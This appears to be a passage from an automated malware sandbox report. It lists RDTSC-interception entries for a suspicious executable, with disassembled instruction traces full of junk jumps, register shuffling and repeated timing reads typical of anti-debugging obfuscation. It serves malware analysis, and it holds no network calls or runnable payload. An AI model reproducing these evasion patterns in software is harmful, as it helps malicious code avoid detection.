                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D7019C second address: 0000000004D70238 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, C3h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b jmp 00007F7E95375D01h 0x00000010 xchg eax, esi 0x00000011 pushad 0x00000012 mov ecx, 6533BF73h 0x00000017 call 00007F7E95375D08h 0x0000001c mov di, si 0x0000001f pop esi 0x00000020 popad 0x00000021 push eax 0x00000022 jmp 00007F7E95375CFCh 0x00000027 xchg eax, esi 0x00000028 pushad 0x00000029 push esi 0x0000002a mov eax, edi 0x0000002c pop ebx 0x0000002d mov di, ax 0x00000030 popad 0x00000031 mov esi, dword ptr [ebp+08h] 0x00000034 jmp 00007F7E95375D00h 0x00000039 xchg eax, edi 0x0000003a jmp 00007F7E95375D00h 0x0000003f push eax 0x00000040 jmp 00007F7E95375CFBh 0x00000045 xchg eax, edi 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F7E95375D00h 0x0000004f rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70238 second address: 0000000004D70247 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70247 second address: 0000000004D7024D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D7024D second address: 0000000004D70251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70251 second address: 0000000004D70255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70255 second address: 0000000004D70265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70265 second address: 0000000004D70269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70269 second address: 0000000004D7026F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D7026F second address: 0000000004D702F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F7F079B408Dh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F7E95375D04h 0x00000016 and cx, 5258h 0x0000001b jmp 00007F7E95375CFBh 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F7E95375D08h 0x00000027 and ecx, 70AEDCB8h 0x0000002d jmp 00007F7E95375CFBh 0x00000032 popfd 0x00000033 popad 0x00000034 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F7E95375D05h 0x00000042 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D702F5 second address: 0000000004D703AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F7F07B147C7h 0x0000000f jmp 00007F7E954D64AEh 0x00000014 mov edx, dword ptr [esi+44h] 0x00000017 pushad 0x00000018 pushad 0x00000019 movzx esi, dx 0x0000001c pushfd 0x0000001d jmp 00007F7E954D64B9h 0x00000022 jmp 00007F7E954D64ABh 0x00000027 popfd 0x00000028 popad 0x00000029 jmp 00007F7E954D64B8h 0x0000002e popad 0x0000002f or edx, dword ptr [ebp+0Ch] 0x00000032 jmp 00007F7E954D64B0h 0x00000037 test edx, 61000000h 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F7E954D64ADh 0x00000046 sbb eax, 1F59A4D6h 0x0000004c jmp 00007F7E954D64B1h 0x00000051 popfd 0x00000052 movzx esi, di 0x00000055 popad 0x00000056 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D703AC second address: 0000000004D703F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F7F079B3FC4h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx ebx, ax 0x00000015 pushfd 0x00000016 jmp 00007F7E95375D06h 0x0000001b sub ecx, 19BAE558h 0x00000021 jmp 00007F7E95375CFBh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D703F0 second address: 0000000004D70433 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d jmp 00007F7E954D64AEh 0x00000012 jne 00007F7F07B14728h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F7E954D64AAh 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70433 second address: 0000000004D70437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70437 second address: 0000000004D7043D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D7043D second address: 0000000004D7045B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 movzx ecx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test bl, 00000007h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7E95375CFEh 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D7045B second address: 0000000004D70461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70461 second address: 0000000004D70465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70465 second address: 0000000004D70469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D8001B second address: 0000000004D8005D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E95375D09h 0x00000009 and ah, FFFFFFD6h 0x0000000c jmp 00007F7E95375D01h 0x00000011 popfd 0x00000012 mov si, 2747h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov cl, bl 0x0000001f mov dh, cl 0x00000021 popad 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D8005D second address: 0000000004D80062 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80062 second address: 0000000004D800E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F7E95375D06h 0x0000000a and si, 1058h 0x0000000f jmp 00007F7E95375CFBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a jmp 00007F7E95375D06h 0x0000001f and esp, FFFFFFF8h 0x00000022 pushad 0x00000023 pushad 0x00000024 movzx eax, bx 0x00000027 pushfd 0x00000028 jmp 00007F7E95375D09h 0x0000002d jmp 00007F7E95375CFBh 0x00000032 popfd 0x00000033 popad 0x00000034 mov si, C4CFh 0x00000038 popad 0x00000039 xchg eax, ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushad 0x0000003e popad 0x0000003f mov edi, 2DA2C460h 0x00000044 popad 0x00000045 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D800E9 second address: 0000000004D80149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 58DBh 0x00000007 mov edi, eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F7E954D64ADh 0x00000012 xchg eax, ebx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F7E954D64ACh 0x0000001a adc cx, 59D8h 0x0000001f jmp 00007F7E954D64ABh 0x00000024 popfd 0x00000025 call 00007F7E954D64B8h 0x0000002a mov esi, 5BED2C11h 0x0000002f pop ecx 0x00000030 popad 0x00000031 push ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80149 second address: 0000000004D80158 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80158 second address: 0000000004D8017E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D8017E second address: 0000000004D80182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80182 second address: 0000000004D80188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80188 second address: 0000000004D801FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 mov di, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f mov bx, ax 0x00000012 mov ax, 0427h 0x00000016 popad 0x00000017 sub ebx, ebx 0x00000019 pushad 0x0000001a pushad 0x0000001b mov dx, 46CAh 0x0000001f mov eax, ebx 0x00000021 popad 0x00000022 pushfd 0x00000023 jmp 00007F7E95375D07h 0x00000028 sub al, 0000001Eh 0x0000002b jmp 00007F7E95375D09h 0x00000030 popfd 0x00000031 popad 0x00000032 test esi, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F7E95375D08h 0x0000003d rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D801FE second address: 0000000004D80202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80202 second address: 0000000004D80208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80208 second address: 0000000004D8020E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D8020E second address: 0000000004D80212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80212 second address: 0000000004D80216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80216 second address: 0000000004D802D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F7F0799BE66h 0x0000000e jmp 00007F7E95375D04h 0x00000013 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001a jmp 00007F7E95375D00h 0x0000001f mov ecx, esi 0x00000021 pushad 0x00000022 movzx esi, dx 0x00000025 mov di, 86EEh 0x00000029 popad 0x0000002a je 00007F7F0799BE3Fh 0x00000030 jmp 00007F7E95375D05h 0x00000035 test byte ptr [77436968h], 00000002h 0x0000003c jmp 00007F7E95375CFEh 0x00000041 jne 00007F7F0799BE22h 0x00000047 pushad 0x00000048 mov esi, 3CC755BDh 0x0000004d mov bx, si 0x00000050 popad 0x00000051 mov edx, dword ptr [ebp+0Ch] 0x00000054 jmp 00007F7E95375D04h 0x00000059 xchg eax, ebx 0x0000005a pushad 0x0000005b jmp 00007F7E95375CFEh 0x00000060 mov si, E8D1h 0x00000064 popad 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F7E95375CFAh 0x0000006d rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D802D3 second address: 0000000004D802D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D802D9 second address: 0000000004D8030A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dx, si 0x0000000f pushfd 0x00000010 jmp 00007F7E95375CFEh 0x00000015 add ecx, 1F87E588h 0x0000001b jmp 00007F7E95375CFBh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D8030A second address: 0000000004D80360 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E954D64AFh 0x00000009 adc ecx, 388029CEh 0x0000000f jmp 00007F7E954D64B9h 0x00000014 popfd 0x00000015 mov cx, 4FD7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F7E954D64B9h 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D8042E second address: 0000000004D80432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80432 second address: 0000000004D80438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80438 second address: 0000000004D80464 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E95375D07h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DE1B12 second address: 0000000004DE1B87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 pushfd 0x00000007 jmp 00007F7E954D64B9h 0x0000000c or ax, DE06h 0x00000011 jmp 00007F7E954D64B1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F7E954D64B3h 0x00000024 and ecx, 39B56D3Eh 0x0000002a jmp 00007F7E954D64B9h 0x0000002f popfd 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DE1B87 second address: 0000000004DE1BB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E95375D04h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DE1BB9 second address: 0000000004DE1C59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F7E954D64B4h 0x00000010 push ecx 0x00000011 pushfd 0x00000012 jmp 00007F7E954D64B1h 0x00000017 xor ah, FFFFFFE6h 0x0000001a jmp 00007F7E954D64B1h 0x0000001f popfd 0x00000020 pop eax 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 jmp 00007F7E954D64B7h 0x00000029 push 0000007Fh 0x0000002b pushad 0x0000002c jmp 00007F7E954D64B4h 0x00000031 mov cx, 0501h 0x00000035 popad 0x00000036 push 00000001h 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F7E954D64B6h 0x00000041 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DE1C59 second address: 0000000004DE1C5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DE1CB0 second address: 0000000004DE1CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DE1CB4 second address: 0000000004DE1CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DE1CBA second address: 0000000004DE1B12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, A1h 0x00000005 pushfd 0x00000006 jmp 00007F7E954D64B7h 0x0000000b or esi, 060172FEh 0x00000011 jmp 00007F7E954D64B9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a retn 0004h 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 push eax 0x00000021 call ebx 0x00000023 mov edi, edi 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007F7E954D64B8h 0x0000002d mov ebx, ecx 0x0000002f popad 0x00000030 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA09CA second address: 0000000004DA09D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA09D0 second address: 0000000004DA09E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E954D64AAh 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA09E6 second address: 0000000004DA09EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D805EB second address: 0000000004D80604 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edx, si 0x00000010 mov al, A8h 0x00000012 popad 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80604 second address: 0000000004D80631 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7E95375CFBh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80631 second address: 0000000004D80635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D80635 second address: 0000000004D8063B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D8063B second address: 0000000004D80675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F7E954D64B0h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7E954D64B7h 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004E0000D second address: 0000000004E00046 instructions: 0x00000000 rdtsc 0x00000002 call 00007F7E95375D06h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7E95375D08h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004E00046 second address: 0000000004E00055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004E00055 second address: 0000000004E0005B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004E0005B second address: 0000000004E0005F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004E0005F second address: 0000000004E000E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F7E95375D07h 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 pushad 0x00000014 mov ch, 60h 0x00000016 pushfd 0x00000017 jmp 00007F7E95375D07h 0x0000001c adc si, 47AEh 0x00000021 jmp 00007F7E95375D09h 0x00000026 popfd 0x00000027 popad 0x00000028 pushad 0x00000029 mov ecx, 6DC2EF0Dh 0x0000002e call 00007F7E95375CFAh 0x00000033 pop esi 0x00000034 popad 0x00000035 popad 0x00000036 push dword ptr [ebp+0Ch] 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c movzx esi, di 0x0000003f mov edi, 3B2A37CAh 0x00000044 popad 0x00000045 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004E000E1 second address: 0000000004E00124 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E954D64AEh 0x00000009 or ecx, 07C7AB88h 0x0000000f jmp 00007F7E954D64ABh 0x00000014 popfd 0x00000015 mov bx, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push dword ptr [ebp+08h] 0x0000001e pushad 0x0000001f jmp 00007F7E954D64B0h 0x00000024 push eax 0x00000025 push edx 0x00000026 movzx eax, dx 0x00000029 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004E00196 second address: 0000000004E001B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004E001B3 second address: 0000000004E001B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004E001B9 second address: 0000000004E001BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0682 second address: 0000000004DB0688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0688 second address: 0000000004DB068C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB068C second address: 0000000004DB06B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 44h 0x0000000b jmp 00007F7E954D64AFh 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ax, bx 0x00000017 movsx edi, si 0x0000001a popad 0x0000001b rdtsc
